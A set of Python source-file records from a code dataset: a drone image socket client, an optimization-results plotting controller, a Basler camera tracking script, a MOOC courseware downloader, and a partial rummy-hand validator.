data.tostring()\n\n # 2st: 소켓통신 - 객체 위치 추가해서 보내주기\n obj_x, obj_y = lct[0], lct[1]\n spot = \"\\n\\b\\n\\b{}:{}\".format(str(obj_x), str(obj_y))\n stringData += spot.encode()\n # 3rd: 소켓통신 - String 형태로 변환한 이미지를 socket을 통해서 전송\n self.sock.send(str(len(stringData)).encode().ljust(16))\n self.sock.send(stringData)\n # self.sock.close() # ...........혹시 이 부분에서 종료해서 끊어졌나..\n\n def sockWaitAnswer(self):\n data = self.sock.recv(1024)\n data = data.decode('utf-8')\n return data\n\n def sockClose(self):\n self.sock.close()\n\n\n\nif __name__ =='__main__':\n drone_client = DRONE_Client()\n img = cv2.imread(\"./container/origin.jpg\")\n drone_client.fullMapChecker(img)\n","sub_path":"drone/DRONE_Client.py","file_name":"DRONE_Client.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"120231310","text":"import numpy as np\nfrom matplotlib.backend_bases import MouseButton\nfrom system.utils.performance import find_closest_point, check_pareto\nfrom .view import VizSpaceView\n\n\nclass VizSpaceController:\n\n def __init__(self, root_controller):\n self.root_controller = root_controller\n self.root_view = self.root_controller.view\n\n # set values from root\n self.config, self.problem_cfg = self.root_controller.config, self.root_controller.problem_cfg\n self.agent = self.root_controller.agent\n\n self.view = VizSpaceView(self.root_view, self.problem_cfg)\n\n # bind command of viewing history to scaler\n self.max_iter = 0\n self.view.scale_iter.configure(command=self.redraw)\n\n # calculate pfront limit (for rescale plot afterwards)\n self.pfront_limit = None\n true_pfront = self.root_controller.true_pfront\n if true_pfront is not None:\n self.pfront_limit = [np.min(true_pfront, axis=1), np.max(true_pfront, axis=1)]\n\n # initialize performance space\n scatter_list = []\n if true_pfront is not None:\n scatter_pfront = self.view.ax1.scatter(*true_pfront.T, color='gray', s=5, label='Oracle') # plot true pareto front\n scatter_list.append(scatter_pfront)\n self.scatter_x = None\n self.scatter_y = self.view.ax1.scatter([], [], color='blue', s=10, label='Evaluated')\n self.scatter_y_pareto = self.view.ax1.scatter([], [], color='red', s=10, label='Pareto front')\n self.scatter_y_new = self.view.ax1.scatter([], [], color='m', s=10, label='New evaluated')\n self.scatter_y_pred = self.view.ax1.scatter([], [], facecolors=(0, 0, 0, 0), edgecolors='m', s=15, label='New predicted')\n scatter_list.extend([self.scatter_y, self.scatter_y_pareto, self.scatter_y_new, self.scatter_y_pred])\n self.scatter_selected = None\n self.line_y_pred_list = []\n\n # support checking design variables\n self.line_x = None\n self.fill_x = None\n self.bar_x = None\n self.text_x = []\n self.view.fig.canvas.mpl_connect('button_press_event', self.check_design_values)\n\n # set pick event on legend to enable/disable certain visualization\n legend = self.view.fig.legend(loc='lower center', ncol=5, frameon=False)\n self.picker_map = {}\n for plot_obj, leg_obj, text in zip(scatter_list, legend.legendHandles, legend.get_texts()):\n leg_obj.set_picker(True)\n text.set_picker(True)\n self.picker_map[leg_obj] = plot_obj\n self.picker_map[text] = plot_obj\n self.view.fig.canvas.mpl_connect('pick_event', self.toggle_performance_visibility)\n\n # refresh figure\n self.view.fig.subplots_adjust(bottom=0.15)\n self.redraw_performance_space(reset_scaler=True)\n\n def set_config(self, config=None):\n if config is not None:\n self.config = config\n\n def redraw(self, val):\n '''\n Redraw design and performance space when slider changes\n '''\n # get current iteration from slider value\n curr_iter = int(val)\n\n # clear design space\n self.clear_design_space()\n\n # replot performance space\n self.redraw_performance_space(curr_iter)\n\n def check_design_values(self, event):\n '''\n Mouse clicking event, for checking design values\n '''\n if event.inaxes != self.view.ax1: return\n\n if event.button == MouseButton.LEFT and event.dblclick: # check certain design values\n n_var, n_obj = self.problem_cfg['n_var'], self.problem_cfg['n_obj']\n var_type, var_name = self.problem_cfg['type'], self.problem_cfg['var_name']\n var_lb, var_ub = self.view.var_lb, self.view.var_ub\n\n # find nearest performance values with associated design values\n loc = [event.xdata, event.ydata]\n all_y = self.scatter_y._offsets\n closest_y, closest_idx = find_closest_point(loc, all_y, return_index=True)\n closest_x = self.scatter_x[closest_idx]\n if n_obj == 3:\n closest_y = np.array(self.scatter_y._offsets3d).T[closest_idx]\n\n # clear checked design values\n self.clear_design_space()\n\n # highlight selected point\n self.scatter_selected = self.view.ax1.scatter(*closest_y, s=50, facecolors=(0, 0, 0, 0), edgecolors='g', linewidths=2)\n\n # compute normalized x\n if var_type in ['continuous', 'integer', 'binary']:\n normalized_x = (np.array(closest_x) - var_lb) / (var_ub - var_lb)\n elif var_type == 'categorical':\n normalized_x = []\n if 'var' in self.problem_cfg:\n for i, (x, var_info) in enumerate(zip(closest_x, self.problem_cfg['var'].values())):\n normalized_x.append((var_info['choices'].index(x) + 1) / var_ub[i])\n else:\n for i, x in enumerate(closest_x):\n normalized_x.append((self.problem_cfg['var_choices'].index(x) + 1) / var_ub[i])\n normalized_x = np.array(normalized_x)\n elif var_type == 'mixed':\n normalized_x = []\n var_type_list = []\n for i, (x, var_info) in enumerate(zip(closest_x, self.problem_cfg['var'].values())):\n var_type_list.append(var_info['type'])\n if var_info['type'] in ['continuous', 'integer']:\n lb, ub = var_info['lb'], var_info['ub']\n normalized_x.append((x - lb) / (ub - lb))\n elif var_info['type'] == 'binary':\n normalized_x.append(x)\n elif var_info['type'] == 'categorical':\n normalized_x.append((var_info['choices'].index(x) + 1) / var_ub[i])\n else:\n raise Exception(f'invalid variable type {var_info[\"type\"]}')\n normalized_x = np.array(normalized_x)\n else:\n raise Exception(f'invalid problem type {var_type}')\n\n # compute text label\n closest_x_str = []\n for i in range(n_var):\n if var_type == 'continuous':\n closest_x_str.append(f'{closest_x[i]:.4g}')\n elif var_type in ['integer', 'binary', 'categorical']:\n closest_x_str.append(f'{closest_x[i]}')\n elif var_type == 'mixed':\n if var_type_list[i] == 'continuous':\n closest_x_str.append(f'{closest_x[i]:.4g}')\n else:\n closest_x_str.append(f'{closest_x[i]}')\n else:\n raise Exception(f'invalid problem type {var_type}')\n \n # plot checked design values as radar plot or bar chart\n if n_var > 2:\n self.line_x = self.view.ax2.plot(self.view.theta, normalized_x, color='g')[0]\n self.fill_x = self.view.ax2.fill(self.view.theta, normalized_x, color='g', alpha=0.2)[0]\n self.view.ax2.set_varlabels([f'{var_name[i]}\\n{closest_x_str[i]}' for i in range(n_var)])\n else:\n self.bar_x = self.view.ax2.bar(self.view.xticks, normalized_x, color='g')\n self.text_x = []\n for i in range(n_var):\n if var_type in ['continuous', 'integer'] or (var_type == 'mixed' and var_type_list[i] in ['continuous', 'integer']):\n self.view.text_lb[i].set_text(str(var_lb[i]))\n self.view.text_ub[i].set_text(str(var_ub[i]))\n text = self.view.ax2.text(self.view.xticks[i], normalized_x[i], f'{closest_x_str[i]}', horizontalalignment='center', verticalalignment='bottom')\n self.text_x.append(text)\n\n elif event.button == MouseButton.RIGHT: # clear checked design values\n self.clear_design_space()\n \n self.view.fig.canvas.draw()\n\n def clear_design_space(self):\n '''\n Clear design space plot\n '''\n if self.scatter_selected is not None:\n self.scatter_selected.remove()\n self.scatter_selected = None\n \n n_var, var_name = self.problem_cfg['n_var'], self.problem_cfg['var_name']\n\n if n_var > 2:\n self.view.ax2.set_varlabels(var_name)\n if self.line_x is not None:\n self.line_x.remove()\n self.line_x = None\n if self.fill_x is not None:\n self.fill_x.remove()\n self.fill_x = None\n else:\n if self.bar_x is not None:\n self.bar_x.remove()\n self.bar_x = None\n for text in self.text_x:\n text.remove()\n self.text_x = []\n\n def redraw_performance_space(self, draw_iter=None, reset_scaler=False):\n '''\n Redraw performance space\n '''\n # load data\n X, Y, Y_expected, pareto, batch = self.agent.load(['X', 'Y', 'Y_expected', 'pareto', 'batch'])\n valid_idx = np.where((~np.isnan(Y)).all(axis=1))[0]\n if len(valid_idx) == 0: return\n X, Y, Y_expected, pareto, batch = X[valid_idx], Y[valid_idx], Y_expected[valid_idx], pareto[valid_idx], batch[valid_idx]\n max_iter = batch[-1]\n\n if reset_scaler:\n # reset the max iteration of scaler\n self.view.scale_iter.configure(to=max_iter)\n if self.view.curr_iter.get() >= self.max_iter:\n self.max_iter = max_iter\n self.view.curr_iter.set(max_iter)\n else:\n # no need to redraw performance space if not focusing on the max iteration\n return\n\n if draw_iter is not None and draw_iter < batch[-1]:\n draw_idx = batch <= draw_iter\n X, Y, Y_expected, batch = X[draw_idx], Y[draw_idx], Y_expected[draw_idx], batch[draw_idx]\n max_iter = batch[-1]\n pareto = check_pareto(Y, self.problem_cfg['obj_type'])\n \n # replot evaluated & pareto points\n self.scatter_x = X\n n_obj = Y.shape[1]\n if n_obj == 2:\n self.scatter_y.set_offsets(Y)\n self.scatter_y_pareto.set_offsets(Y[pareto])\n elif n_obj == 3:\n self.scatter_y._offsets3d = Y.T\n self.scatter_y_pareto._offsets3d = Y[pareto].T\n \n # rescale plot according to Y and true_pfront\n n_obj = self.problem_cfg['n_obj']\n x_min, x_max = np.min(Y[:, 0]), np.max(Y[:, 0])\n y_min, y_max = np.min(Y[:, 1]), np.max(Y[:, 1])\n if n_obj == 3: z_min, z_max = np.min(Y[:, 2]), np.max(Y[:, 2])\n if self.pfront_limit is not None:\n x_min, x_max = min(x_min, self.pfront_limit[0][0]), max(x_max, self.pfront_limit[1][0])\n y_min, y_max = min(y_min, self.pfront_limit[0][1]), max(y_max, self.pfront_limit[1][1])\n if n_obj == 3: z_min, z_max = min(z_min, self.pfront_limit[0][2]), max(z_max, self.pfront_limit[1][2])\n x_offset = (x_max - x_min) / 20\n y_offset = (y_max - y_min) / 20\n if n_obj == 3: z_offset = (z_max - z_min) / 20\n self.view.ax1.set_xlim(x_min - x_offset, x_max + x_offset)\n self.view.ax1.set_ylim(y_min - y_offset, y_max + y_offset)\n if n_obj == 3: self.view.ax1.set_zlim(z_min - z_offset, z_max + z_offset)\n\n # replot new evaluated & predicted points\n line_vis = True\n for line in self.line_y_pred_list:\n line_vis = line_vis and line.get_visible()\n line.remove()\n self.line_y_pred_list = []\n\n if max_iter > 0:\n last_batch = np.where(batch == max_iter)[0]\n if n_obj == 2:\n self.scatter_y_new.set_offsets(Y[last_batch])\n self.scatter_y_pred.set_offsets(Y_expected[last_batch])\n elif n_obj == 3:\n self.scatter_y_new._offsets3d = Y[last_batch].T\n self.scatter_y_pred._offsets3d = Y_expected[last_batch].T\n for y, y_expected in zip(Y[last_batch], Y_expected[last_batch]):\n line = self.view.ax1.plot(*[[y[i], y_expected[i]] for i in range(n_obj)], '--', color='m', alpha=0.5)[0]\n line.set_visible(line_vis)\n self.line_y_pred_list.append(line)\n else:\n empty_y = np.empty((0, n_obj))\n if n_obj == 2:\n self.scatter_y_new.set_offsets(empty_y)\n self.scatter_y_pred.set_offsets(empty_y)\n elif n_obj == 3:\n self.scatter_y_new._offsets3d = empty_y.T\n self.scatter_y_pred._offsets3d = empty_y.T\n\n self.view.fig.canvas.draw()\n\n def toggle_performance_visibility(self, event):\n '''\n Toggle visibility of plotted objs\n '''\n plot_obj = self.picker_map[event.artist]\n vis = not plot_obj.get_visible()\n plot_obj.set_visible(vis)\n if vis:\n event.artist.set_color('black')\n else:\n event.artist.set_color('gray')\n\n if not self.scatter_y_new.get_visible() or not self.scatter_y_pred.get_visible():\n for line in self.line_y_pred_list:\n line.set_visible(False)\n if self.scatter_y_new.get_visible() and self.scatter_y_pred.get_visible():\n for line in self.line_y_pred_list:\n line.set_visible(True)\n\n self.view.fig.canvas.draw()\n\n def save_performance_figure(self, path, title=None):\n '''\n '''\n self.view.save_performance_figure(path, title=title)\n\n def save_design_figure(self, path, title=None):\n '''\n '''\n self.view.save_design_figure(path, self.line_x, self.bar_x, self.text_x, title=title)","sub_path":"system/scientist/viz/space/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":13878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521815865","text":"from collections import deque\n\nimport cv2\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle\nfrom pypylon import pylon, genicam\n\ncountOfImagesToGrab = 1\nmaxCamerasToUse = 2\n\n# Init all camera\ntry:\n # Get the transport layer factory.\n tlFactory = pylon.TlFactory.GetInstance()\n\n # Get all attached devices and exit application if no device is found.\n devices = tlFactory.EnumerateDevices()\n if len(devices) == 0:\n raise pylon.RUNTIME_EXCEPTION(\"No camera present.\")\n\n # Create an array of instant cameras for the found devices and avoid exceeding a maximum number of devices.\n cameras = pylon.InstantCameraArray(min(len(devices), maxCamerasToUse))\n\nexcept genicam.GenericException as e:\n # Error handling\n print(\"An exception occurred. {}\".format(e))\n exitCode = 1\n\nOffSet = {1: {'X': 500, 'Y': 250}, 0: {'X': 270, 'Y': 120}}\n\ntest = {}\n\ndef init(camera_id, camera, devices):\n # conecting to the first available camera\n #camera = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())\n test[camera_id] = camera\n camera.Attach(tlFactory.CreateDevice(devices[camera_id]))\n camera.Open()\n camera.StopGrabbing()\n b = camera.IsOpen()\n a = camera.GetDeviceInfo().GetModelName()\n b = camera.GetDeviceInfo().GetSerialNumber()\n c = camera.GetDeviceInfo().GetIpAddress()\n camera.GetDeviceInfo().SetFriendlyName('Camera1'.format('utf-8'))\n d = camera.GetDeviceInfo().GetFriendlyName()\n camera.Width = 550\n e = getattr(camera, 'Width').GetValue()\n camera.Height = 550\n camera.OffsetX.SetValue(OffSet[camera_id]['X'])\n camera.OffsetY = OffSet[camera_id]['Y']\n camera.GainAuto = 'Off'\n camera.GainRaw = 0\n camera.BlackLevelRaw.SetValue(-30)\n camera.TriggerSource = \"Line1\"\n camera.trigger_mode.SetValue(\"On\")\n camera.TriggerDelayAbs.SetValue(185000)\n camera.ExposureTimeAbs.SetValue(15000.0)\n camera.BalanceRatioRaw.SetValue(64)\n camera.AcquisitionFrameRateEnable.SetValue(False)\n camera.AcquisitionFrameRateAbs.SetValue(5)\n camera.PixelFormat.SetValue(\"Mono8\")\n converter = pylon.ImageFormatConverter()\n\n # Transport layer\n # Packet Size\n camera.GevSCPSPacketSize.SetValue(1500)\n # Inter-Packet Delay\n camera.GevSCPD.SetValue(1000)\n\n # converting to opencv bgr format\n converter.OutputPixelFormat = pylon.PixelType_Mono8\n converter.OutputBitAlignment = pylon.OutputBitAlignment_MsbAligned\n\n return converter\n\n\ndef read(camera, converter):\n grabResult = camera.RetrieveResult(1500, pylon.TimeoutHandling_ThrowException)\n if grabResult.GrabSucceeded():\n # Access the image data\n image = converter.Convert(grabResult)\n #img = imutils.resize(image.GetArray(), width=480, height=480)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n grabResult.Release()\n arr = image.GetArray()\n return arr\n\n\ndef image_treat(image):\n img = cv2.GaussianBlur(image, (3, 3), 0)\n return img\n\n\ndef calc(img, threshold=50):\n # apply thresholding\n\n ret, thresh = cv2.threshold(img, threshold, 255, 0)\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n longest_contour = 0\n longest_contour_index = 0\n i = 0\n for contour in contours:\n if longest_contour < contour.shape[0]:\n longest_contour_index = i\n longest_contour = contour.shape[0]\n i += 1\n #plt.figure()\n #plt.imshow(img)\n # edge detection\n # apply Canny edge detection\n #tight = cv2.Canny(thresh, threshold, 255)\n\n # calculate the centre of moment\n #cv2.drawContours(img, contours[longest_contour_index], -1, (0, 255, 0), 3)\n M = cv2.moments(contours[longest_contour_index])\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n return thresh, contours, cX, cY\n\n\nconverters = []\n\nfor i, camera in enumerate(cameras):\n print(f'Camera {i} is initializing')\n converters.append(init(i, camera, devices))\n camera.StartGrabbing(pylon.GrabStrategy_LatestImageOnly)\n#cameras.StartGrabbing(pylon.GrabStrategy_LatestImageOnly, pylon.GrabLoop_ProvidedByInstantCamera)\none, two = 1, 0\ncamera1 = cameras[one]\nconverter1 = converters[one]\ncamera2 = cameras[two]\nconverter2 = converters[two]\n\n\n# Figure\nfig = plt.figure(figsize=(8.5, 5.5))\n# create two subplots\n\nax_im1 = fig.add_subplot(3, 2, 1)\n\nax1_x = fig.add_subplot(3, 2, 3)\nax1_x.set_ylim(275, 300)\nax1_x.set_ylabel('X1 position')\n\nax1_y = fig.add_subplot(3, 2, 5)\nax1_y.set_ylim(260, 285)\nax1_y.set_ylabel('Y1 position')\n\n\n\n# create two image plots\nimg1 = read(camera1, converter1)\n\npositionsX1 = deque([], maxlen=120)\npositionsY1 = deque([], maxlen=120)\n\nim1_1 = ax_im1.imshow(calc(img1)[0], cmap='gray', vmin=0, vmax=255)\nim1_2 = ax_im1.imshow(img1, cmap='gray', vmin=0, vmax=255, alpha=0.6)\nXpos1, = ax1_x.plot([1], [1], marker='o', markersize=2, color='b', linestyle= '')\nYpos1, = ax1_y.plot([1], [1], marker='o', markersize=2, color='b', linestyle= '')\n\nfig.show()\n\nplt.ion()\n\nwhile camera1.IsGrabbing():\n [p.remove() for p in reversed(ax_im1.patches)]\n img1 = read(camera1, converter1)\n img2 = read(camera2, converter2)\n img1 = image_treat(img1)\n img2 = image_treat(img2)\n thresh1, contours1, cX1, cY1 = calc(img1)\n positionsX1.append(cX1)\n positionsY1.append(cY1)\n im1_1.set_data(thresh1)\n im1_2.set_data(img1)\n\n circle1 = Circle((cX1, cY1), radius=10, color='black', zorder=10)\n ax_im1.add_patch(circle1)\n x1 = list([i for i in range(len(positionsX1))])\n Xpos1.set_data(x1, positionsX1)\n Ypos1.set_data(x1, positionsY1)\n\n ax1_x.relim()\n ax1_y.relim()\n ax1_x.autoscale_view(True, True, True)\n ax1_y.autoscale_view(True, True, True)\n plt.pause(0.2)\n\nplt.ioff()\nfig.show()\n\n# Releasing the resource\ncamera.StopGrabbing()\n","sub_path":"utilities/mytests/test_pypylon/CameraBasler_1camera.py","file_name":"CameraBasler_1camera.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"273426021","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport threading\nimport time\n\nimport PyQtBase\nimport requests\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nimport traceback\n\nrequests.adapters.DEFAULT_RETRIES = 5\ndriver_path = os.path.join(os.getcwd(), 'chromedriver.exe')\nprint('os.getcwd() {}'.format(driver_path))\ndriver = webdriver.Chrome(driver_path)\n\n\nclass UI(QtWidgets.QFrame):\n logsListItemCountChanged = QtCore.pyqtSignal(str)\n comicRetileCompleted = QtCore.pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(UI, self).__init__(parent)\n global driver\n self.wait = WebDriverWait(driver, 10)\n self.initUI()\n\n def initUI(self):\n self.vbox = QtWidgets.QVBoxLayout()\n\n self.initUrlRow()\n self.initFileSaveRow()\n\n self.setLayout(self.vbox)\n self.setObjectName('mooc')\n\n def initUrlRow(self):\n hbox = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel('课件URL')\n label.setAlignment(QtCore.Qt.AlignCenter)\n label.setProperty('class', 'mooc-label')\n\n self.urlEdit = QtWidgets.QLineEdit()\n self.urlEdit.setProperty('class', 'mooc-line-edit')\n\n start_btn = QtWidgets.QPushButton('开始')\n start_btn.setProperty('class', 'comic-btn')\n start_btn.setCursor(QtCore.Qt.PointingHandCursor)\n start_btn.clicked.connect(self.startReptileMoocEvent)\n self.startBtn = start_btn\n\n hbox.addWidget(label)\n hbox.addWidget(self.urlEdit)\n hbox.addWidget(start_btn)\n hbox.setStretchFactor(label, 1)\n hbox.setStretchFactor(self.urlEdit, 5)\n hbox.setStretchFactor(start_btn, 1)\n\n self.vbox.addLayout(hbox)\n\n def initFileSaveRow(self):\n hbox = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel('保存目录')\n label.setAlignment(QtCore.Qt.AlignCenter)\n label.setProperty('class', 'mooc-label')\n\n self.savePathEdit = PyQtBase.CustomizeLineEditEvent()\n self.savePathEdit.setProperty('class', 'mooc-line-edit')\n self.savePathEdit.setToolTip('双击选择文件保存路径')\n # self.savePathEdit.textChanged.connect(self.filePathChangeEvent)\n self.savePathEdit.mouseDoubleClicked.connect(\n self.selectorSavePathEvent)\n\n selector_btn = QtWidgets.QPushButton('路径...')\n selector_btn.setProperty('class', 'mooc-btn')\n selector_btn.setCursor(QtCore.Qt.PointingHandCursor)\n selector_btn.clicked.connect(self.selectorSavePathEvent)\n\n hbox.addWidget(label)\n hbox.addWidget(self.savePathEdit)\n hbox.addWidget(selector_btn)\n hbox.setStretchFactor(label, 1)\n hbox.setStretchFactor(self.savePathEdit, 5)\n hbox.setStretchFactor(selector_btn, 1)\n\n self.vbox.addLayout(hbox)\n\n def selectorSavePathEvent(self, event):\n dirPath = QtWidgets.QFileDialog().getExistingDirectory(\n self, '选择保存路径', '')\n if dirPath:\n if os.path.exists(dirPath):\n self.savePathEdit.setText(dirPath)\n\n # 课件地址 存储路径 范围[a, b](第a章到第b章,默认[0, 0]表示全部) # courseware_url, path, c_range=[0, 0]\n def get_courseware(self):\n global driver\n t = 0\n while t < 2:\n try:\n driver.get(self.courseware_url)\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"#g-body > div.m-learnhead > div > div > div > a.f-fl > h4\"\n )))\n school_name = re.findall(r'/([a-zA-Z]+)-',\n self.courseware_url)[0]\n title = h3.text\n path1 = os.path.join(self.path, title + \"_\" + school_name)\n if not os.path.exists(path1):\n os.makedirs(path1)\n # 总章节数\n h3_count = len(\n driver.find_elements_by_css_selector(\n \"div > div.m-learnChapterList> div.m-learnChapterNormal > div.titleBox > h3\"\n ))\n if self.c_range[1] == 0:\n c_range2 = h3_count\n else:\n c_range2 = self.c_range[1]\n for index in range(3 + self.c_range[0], 3 + c_range2):\n try:\n driver.refresh()\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child(3) > div.titleBox > h3\"\n )))\n h3.click()\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child({}) > div.titleBox > h3\"\n .format(index))))\n h3_text = h3.text\n print(\"h3_text {}:\".format(h3_text), end=\"\\t\")\n patten = re.compile('.*?第(.{1,3})(周|章).*?')\n match = re.match(patten, h3_text)\n if match:\n week = match.group(0)\n else:\n week = h3_text\n h3.click()\n time.sleep(3)\n file_count = len(\n driver.find_elements_by_xpath(\n '//div[@class=\"f-icon lsicon f-fl \"]/span[@class=\"u-icon-doc\"]'\n ))\n print(\"file_count \", file_count)\n week = str(index - 3) + week.replace(\":\", \"-\").replace(\n \"/\", \" \").replace(\"\\\\\", \" \").replace(\"课件:\", \" \")\n path = os.path.join(path1, week)\n if not os.path.exists(path):\n os.makedirs(path)\n for f_index in range(1, file_count + 1):\n # title = driver.find_element_by_xpath('//div[@class=\"f-icon lsicon f-fl \"][{}]/span[@class=\"u-icon-doc\"]/..'.format(f_index))\n title = self.wait.until(\n EC.element_to_be_clickable((\n By.XPATH,\n '(//div[contains(@class,\"f-icon lsicon f-fl \")]/span[@class=\"u-icon-doc\"])[{}]/..'\n .format(f_index))))\n title = title.get_attribute(\"title\")\n driver.find_element_by_xpath(\n '(//div[contains(@class,\"f-icon lsicon f-fl \")]/span[@class=\"u-icon-doc\"])[{}]/..'\n .format(f_index)).click()\n time.sleep(0.2)\n download_btn = self.wait.until(\n EC.element_to_be_clickable(\n (By.PARTIAL_LINK_TEXT, '文档下载')))\n self.download_url = download_btn.get_attribute(\n \"href\")\n title = title.replace(\":\", \"-\").replace(\n \"/\", \" \").replace(\"\\\\\", \" \").replace(\n \"课件:\",\n \" \").replace(\"/\", \" \").replace('文档:', '')\n print(\"week title\", week, \" \", title)\n suffix = self.download_url.split(\".\")[-1]\n self.file_name = path + \"\\\\\" + title + \".\" + suffix.split(\n '&')[0]\n print('文件名: ', self.file_name)\n self.download()\n driver.back()\n time.sleep(1)\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child(3) > div.titleBox > h3\"\n )))\n h3.click()\n h3 = self.wait.until(\n EC.element_to_be_clickable((\n By.CSS_SELECTOR,\n \"div > div.m-learnChapterList> div.m-learnChapterNormal:nth-child({}) > div.titleBox > h3\"\n .format(index))))\n h3.click()\n except TimeoutException as e:\n print('超时 ', e)\n traceback.print_exc()\n except ElementClickInterceptedException as e:\n print('点击失败 ', e)\n traceback.print_exc()\n t = 5\n except FileNotFoundError:\n print(\n \"FileNotFoundError: [Errno 2] No such file or directory: \")\n t += 1\n\n def download(self):\n headers = {\n 'Host':\n 'hubble.netease.com',\n 'Origin':\n 'https://www.icourse163.org',\n 'Referer':\n self.download_url.split(\"#\")[0],\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'\n }\n if not os.path.exists(\n self.file_name) or os.path.getsize(self.file_name) <= 10:\n with open(self.file_name, \"wb\") as f:\n r = requests.get(self.download_url,\n headers=headers,\n verify=False)\n f.write(r.content)\n f.close()\n print(\"\\t下载成功:{}\".format(self.file_name))\n else:\n print(\"\\t文件已存在:{}\".format(self.file_name))\n\n def startReptileMoocEvent(self):\n # 课件地址 存储路径 范围[a, b](第a章到第b章,默认[0, 0]表示全部)\n self.courseware_url = self.urlEdit.text()\n self.path = self.savePathEdit.text()\n self.c_range = [0, 0]\n if len(self.courseware_url) > 0 and len(self.path) > 0:\n td = threading.Thread(target=self.threadMethod, name='mooc')\n td.start()\n\n def threadMethod(self):\n self.get_courseware()\n # 退出浏览器\n global driver\n driver.quit()\n\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n m = UI()\n m.show()\n sys.exit(app.exec_())\n","sub_path":"python/pyqt/tools/mooc.py","file_name":"mooc.py","file_ext":"py","file_size_in_byte":11318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216506395","text":"def check_pure(L) :\n if check_pure_equal(L) :\n return True\n c = 0\n c = check_pure_half1(L) + c\n c = check_pure_half2(L) + c\n if c == 2 :\n return True\n else :\n return False\n\ndef check_pure_half2(L) :\n c = 0\n if len(L) == 4 :\n if L[0][0] == L[1][0] == L[2][0] == L[3][0] :\n c = c + 1\n if len(L) == 3 :\n if L[0][0] == L[1][0] == L[2][0]:\n c = c + 1\n if len(L) == 2 :\n if L[0][0] == L[1][0] :\n c = c + 1\n return c\n\ndef check_pure_equal(L) :\n if len(L) == 4 :\n \tif L[0] == L[1] == L[2] == L[3]:\n return True\n elif len(L) == 3 :\n if L[0] == L[1] == L[2]:\n return True\n elif len(L) == 2 :\n if L[0] == L[1]:\n return True\n else :\n return False\n\n\ndef check_pure_half1(L) :\n\n n = 0\n c = 0\n for i in range(0, len(L0)- 1) :\n if L[0][1] == L0[i] :\n for j in range(1, len(L)) :\n i = i + 1\n if i < len(L0) - 1 :\n if(L[j][1] != L0[i]) :\n n = n + 1\n break\n if n == 0 :\n c = c + 1\n break\n return c\n\n\ndef check_jokers(L) :\n\n pos = []\n for i in range(0, len(L)) :\n if L[i] == \"joker\" :\n pos.append(i)\n return pos\n\n\ndef check_impure(L) :\n\n L_new = []\n L_new1 = []\n pos = []\n pos = check_jokers(L)\n\n if len(pos) == 1 :\n if pos[0] == 0:\n L_new = L[1 : len(L)]\n\n if check_pure(L_new) :\n return True\n\n if pos[0] == len(L) - 1 :\n L_new = L[0 : len(L) - 1]\n\n if check_pure(L_new) :\n return True\n\n if len(L) == 3 :\n\n\n if pos[0] == 1 :\n L_new = [x for x in L if x != \"joker\"]\n\n if position(L_new) == -2 and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n return True\n\n if len(L) == 4 :\n\n if pos[0] == 1 :\n L_new1.append(L[0])\n L_new1.append(L[2])\n L_new.append(L[2])\n L_new.append(L[3])\n t1 = position(L_new1)\n t2 = position(L_new)\n\n if t1 == -2 and t2 == -1 and (check_pure_half2(L_new1) or check_pure_equal(L_new1))and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n return True\n\n if pos[0] == 2 :\n L_new1.append(L[0])\n L_new1.append(L[1])\n L_new.append(L[1])\n L_new.append(L[3])\n t1 = position(L_new1)\n t2 = position(L_new)\n\n if t1 == -1 and t2 == -2 and (check_pure_half2(L_new1) or check_pure_equal(L_new1))and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n return True\n if len(L) == 4 :\n if len(pos) == 2:\n if pos[0] == 0 and pos[1] == 3 :\n L_new = [x for x in L if x != \"joker\"]\n if check_pure(L_new) :\n return True\n if (pos[0] == 0 and pos[1] == 2) or (pos[0] == 1 and pos[1] == 3):\n L_new = [x for x in L if x != \"joker\"]\n if position(L_new) == -2 and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n return True\n\n if pos[0] == 1 and pos[1] == 2 :\n L_new = [x for x in L if x != \"joker\"]\n if position(L_new) == -3 and (check_pure_half2(L_new) or check_pure_equal(L_new)):\n return True\n return False\n \n\ndef position(L) :\n n = 0\n for i in range(0, len(L0)) :\n if L[0][1] == 